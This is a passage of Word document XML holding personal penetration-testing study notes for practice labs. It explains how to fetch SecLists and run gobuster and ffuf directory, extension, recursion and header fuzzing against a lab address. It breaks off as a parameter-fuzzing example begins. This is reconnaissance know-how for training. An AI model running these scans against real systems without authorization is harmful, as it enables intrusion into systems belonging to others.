        <w:t xml:space="preserve">Here is how to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download the SecLists </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inside of /usr/share/wordlists/SecLists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001142">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo git clone https://github.com/danielmiessler/SecLists.git /usr/share/wordlists/SecLists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001143">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001144">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001145">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to find more files, add extensions! Some things like /admin.php won't show up if you don't add extensions, since enumerating /admin sometimes won't be configured to go to /admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001146">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, you have wil have to add extensions. In GoBuster, you do "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-x php,html,txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and in ffuf you do "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e .php,.js,.json,.html,.txt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147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't add extensions, then you risk the chance of not finding stuff. Don't add too many extensions though, or else it will make the search too long</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001148">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001149">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide on ffuf (it's good for both directory enumeration AND subdomain enumeration)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there's a website on port 8080, you will have to specify the port in the URL, like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="300"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.10.10.10:8080/FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001150">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t5ss2gd4v9n5" w:id="142"/>
      <w:bookmarkEnd w:id="142"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic URL Fuzzing (finding URL paths):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001151">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt -ic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without extensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001153">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt -ic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e .php,.js,.json,.html,.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001154">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With extensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001155">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I like this wordlist better than the dirbuster wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001156">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I heard it's really good for XXXXXXXXX. For example, it found the vulnerable directory in Relia Challenge Lab .246 that the dirbuster one couldn't find</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001157">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001158">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -ic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001159">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirb/big.txt -ic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000115A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are dealing with a virtual host, put the domain instead of the IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000115B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to speed it up, add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 100</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The default is 40</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000115C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ignores the wordlist comments which are useless</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000115D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, the keyword "FUZZ" is a placeholder and it's where all the words from the wordlist go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000115E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECURSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--recursion -recursion-depth 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> anywhere in the command, and replace "2" with any number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000115F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e .php,.js,.json,.html,.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to specify file types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001160">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to add the "." before the file types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001161">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001162">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For adding/overwrite HTTP headers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001163">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H "X-Forwarded-For: 10.10.10.10"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is specifically for the X-Forwarded-For header, but you can replace it with any header. Just use the -H flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001165">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001166">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will append the header, unless the header already exists, in that case it will overwrite the original header instead of appending</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001167">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if you need to add/overwrite multiple headers, then just use the flag multiple times (idk if that works though)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001168">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001169">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mqgnwmru2lcd" w:id="143"/>
      <w:bookmarkEnd w:id="143"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameter fuzzing</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever have a blank page, then try parameter fuzzing like in </w:t>
      </w:r>
      <w:hyperlink r:id="rId343">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EvilBox-One</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we have a blank page like evil.php, and then we do:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
